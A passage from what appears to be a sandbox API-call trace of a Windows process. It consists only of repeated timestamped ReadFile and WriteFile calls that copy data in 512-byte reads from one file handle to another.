nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.869] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.869] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.870] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.870] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.871] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x277, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.871] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.872] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.872] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.872] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2af, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.873] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.873] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.874] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.874] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.875] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.875] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.876] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.876] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.877] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.877] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.877] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.878] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.878] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.879] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.879] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.880] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.880] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.881] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.881] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.882] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.882] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.883] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.883] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.883] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.884] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.884] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x293, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.885] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.885] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.886] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.886] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.886] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.887] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x298, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.887] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.888] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.888] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.889] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x289, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.889] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.890] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ae, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.890] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.891] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x306, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.891] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.891] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.892] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.892] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.893] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.893] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x293, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.894] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.894] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2dc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.895] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.895] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.896] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.896] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.897] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.897] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x284, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.898] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.898] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.899] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.899] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.899] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.900] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.900] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.901] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.901] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.902] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.902] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.903] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x21e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.903] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.903] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x297, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.904] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.904] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.905] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.905] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.906] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.906] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.907] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.907] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x301, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.908] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.908] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.908] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.909] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x273, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.910] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.910] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.911] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.911] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.912] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.912] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.912] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.913] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.913] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.914] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27f, lpNumberOfBytesWritten=0x4bd370, 